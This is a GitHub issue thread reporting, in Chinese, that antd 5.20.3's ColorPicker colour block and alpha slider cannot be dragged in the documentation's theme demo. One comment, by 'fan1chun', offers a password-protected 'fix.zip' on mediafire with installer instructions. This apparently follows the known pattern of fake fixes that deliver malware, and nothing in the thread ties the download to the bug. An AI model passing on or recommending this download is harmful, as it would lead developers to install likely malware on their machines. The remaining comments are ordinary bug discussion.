### ISSUE TITLE
ColorPicker  颜色无法透明度和颜色模块无法拖动

### ISSUE THREAD

**Issue by Abiel1024** [ant-design/ant-design#50638]
### Reproduction link

[![Edit on CodeSandbox](https://codesandbox.io/static/img/play-codesandbox.svg)](https://codesandbox.io/p/sandbox/sandpack-project-2rrzg9?file=%2Fpackage.json&utm_medium=sandpack)

### Steps to reproduce

从官网打开研发--定制主题--动态切换模块，，打开颜色选择，拖动色块和透明度

### What is expected?

打开颜色选择，色块和透明度可正常选择

### What is actually happening?

打开颜色选择，色块和透明度不可选  只有当前色块下色值可以拖动

| Environment | Info |
| --- | --- |
| antd | 5.20.3 |
| React | 18.3.1 |
| System | windows 11 |
| Browser | 128.0.6613.113 |

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sakuraee** [comment]
@MadCcc 文档这处的demo属性绑定有点问题我觉得，我修改了修改可以检视一下
